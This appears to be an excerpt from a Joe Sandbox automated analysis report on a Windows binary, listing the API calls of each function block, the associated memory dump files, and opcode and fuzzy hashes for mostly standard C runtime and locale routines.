                                                                                                                                                                                                                                                                • Instruction ID: 59f9495555860252f8a5d90802b8655cacd655d99ea89ac804bf5ff454a55345
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adfb9526e472870a16e4e9f26ffbe9ce94682e5812a1a432f8e7c4eeefaf6d1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51E675640305AADB27AB748C82BAB73E8EF44740F960429FA45FF181FBB4F9408661
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0033DEAD,?,?,00000000,00000000,00000000,?), ref: 0033DFD1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                • Opcode ID: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
                                                                                                                                                                                                                                                                • Instruction ID: 6832b44ba00bb5470a1a0579ed5b7a189e2c35d06e17bdeb6d710891df54f431
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5e654b550f58591b4924db8d918cbe1ed9a9f71b8592fdada19ea51434f6dda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB416A75900209AFCF2ADF99DCC1AEEBBB5FF48304F198059FA04AB2A1D3759950DB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0033DA8F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                                • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                • Opcode ID: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
                                                                                                                                                                                                                                                                • Instruction ID: 38b9783ec555db0397c5be45d1619ac59bbb7b2c94dfcf46af2d65e70c71819e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60cbdaf46866b34a5648e6910b6117ebfedd7c724d1b24a7b10f7fe76cde6095
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2931D336904358EBCF239F50ECC09AABB65FF08366F1A415AF8544A221C332DDA1DB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334B74
                                                                                                                                                                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00334C5C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                • String ID: xf5
                                                                                                                                                                                                                                                                • API String ID: 3761405300-3233278200
                                                                                                                                                                                                                                                                • Opcode ID: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
                                                                                                                                                                                                                                                                • Instruction ID: ae0045f139252531c4e8317b9b3654f9b0213b535595028786e2403dd990333f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf47784ec2f67307acba9d93d6b2f164b10ffdc1b2d9e183f1291bf0f3f2ec01
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F121BCB45013009BE742CF25E996A447BF8FB4C71AF90A12AE5098B2B0E3B1A981CF44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00334A97
                                                                                                                                                                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00334B54
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                • String ID: xf5
                                                                                                                                                                                                                                                                • API String ID: 3761405300-3233278200
                                                                                                                                                                                                                                                                • Opcode ID: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
                                                                                                                                                                                                                                                                • Instruction ID: 49955a5a2f8e361df205bd5cda239a701fc750f7933f95105447d64667ecc4bd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3313f355f4262e4aee77c84f65f003206437021610f510b8a0c0ce9b56f8ccb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79117CB45113049FD742DF29E9926847BF8FB5C30AF81A16AE8098B3B0E7B1A941DF45
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(0035648C,ios_base::badbit set,?,?,00331C84,00356478,00331B17), ref: 003329DF
                                                                                                                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(0035648C,?,?,00331C84,00356478,00331B17), ref: 00332A19
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                                • String ID: ios_base::badbit set
                                                                                                                                                                                                                                                                • API String ID: 17069307-3882152299
                                                                                                                                                                                                                                                                • Opcode ID: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
                                                                                                                                                                                                                                                                • Instruction ID: c68281c861aa9789a1de3e04c7269859f17442c06503819a2f82e2d8ebc08e7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7936fca03474572396c33a4047219b93dd75fe3ee437d2938f019ec66f2d6a30
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0A034500200DFCB22AF19E884B26BBBCFB85776F10032EE89A476B0CB312842CA51
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 00343211
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 0034323A
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,00342B49,?,00000000), ref: 0034324F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                • Opcode ID: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
                                                                                                                                                                                                                                                                • Instruction ID: 8aeb6df0ff504761a8a55181b15ebaa4dc90fc8ebeef7be550dec4e94857a289
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8421AC32600105AADB379F64D805BAB73EAAF94B50B278824E90ADF120E772FF40D750
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00342B1B
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00342B59
                                                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00342B6C
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00342BB4
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00342BCF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415426439-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
                                                                                                                                                                                                                                                                • Instruction ID: c094710c0944b4c8c9d8e9a3f819a19409c888755eeb19e69a3870340a802e1a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD514F71A00215AEDB22DFA4CC85AAF77F8FF14701F964469B901FF191DB70AA44CB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00331098: _strlen.LIBCMT ref: 003310F9
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00331685
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003316AB
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 003316BA
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00331705
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00331805
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1490117831-0
                                                                                                                                                                                                                                                                • Opcode ID: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
                                                                                                                                                                                                                                                                • Instruction ID: 6391c2f71201945b2327666c6f9712f871c14ec481b36ec80670bfc85c3ec831
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF51F1B19043009BD702AF24DCC5B2FB7E9FF88344F154A2DF4899B251E734D9448752
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034384A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                • Opcode ID: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
                                                                                                                                                                                                                                                                • Instruction ID: 7a9d823f42a28687bba70c4d099d0ce5dfc8ccaced0def9fc1d1400c876ef318
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3971D1B19051696EDF22AF68CC8DBBABBF8EF05300F1441DAE0499B251DB356F858F10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0033502C
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 003350F8
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00335111
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0033511B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                                                • Opcode ID: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
                                                                                                                                                                                                                                                                • Instruction ID: 636bb8f79a09921e7fe6b2adf43999b880af472314639bca5086842764a831e9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54310AB5D053199BDF22DF64DD897CDBBB8AF08300F1041AAE40DAB250EB719B858F45
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CryptContextAddRef.ADVAPI32(00000000,00000000,00000000), ref: 003312C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ContextCrypt
                                                                                                                                                                                                                                                                • String ID: [+]
                                                                                                                                                                                                                                                                • API String ID: 3075001677-4228040803
                                                                                                                                                                                                                                                                • Opcode ID: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
                                                                                                                                                                                                                                                                • Instruction ID: a20e516cb6cae4faa6fadfd2449bea0bb9716dc07962e03462675f9676428fb2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A231F73550C3804BD717AB34A8D97EBBBD4ABBE318F19097DD8C9C7243D2A15449CB62
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0034A20D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0034A2C8
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0034A383
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0034A412
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A45D
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A463
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A499
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A49F
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A4AF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 127012223-0
                                                                                                                                                                                                                                                                • Opcode ID: 89dfba7ac1d0dc66af4554857689ca06dd70097fbc84477bb7a7c6c08776b435
                                                                                                                                                                                                                                                                • Instruction ID: 1b669aae874db035082a594098e0e14e9c944b3aebe5aa88a4c3b07b1216b2c9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89dfba7ac1d0dc66af4554857689ca06dd70097fbc84477bb7a7c6c08776b435
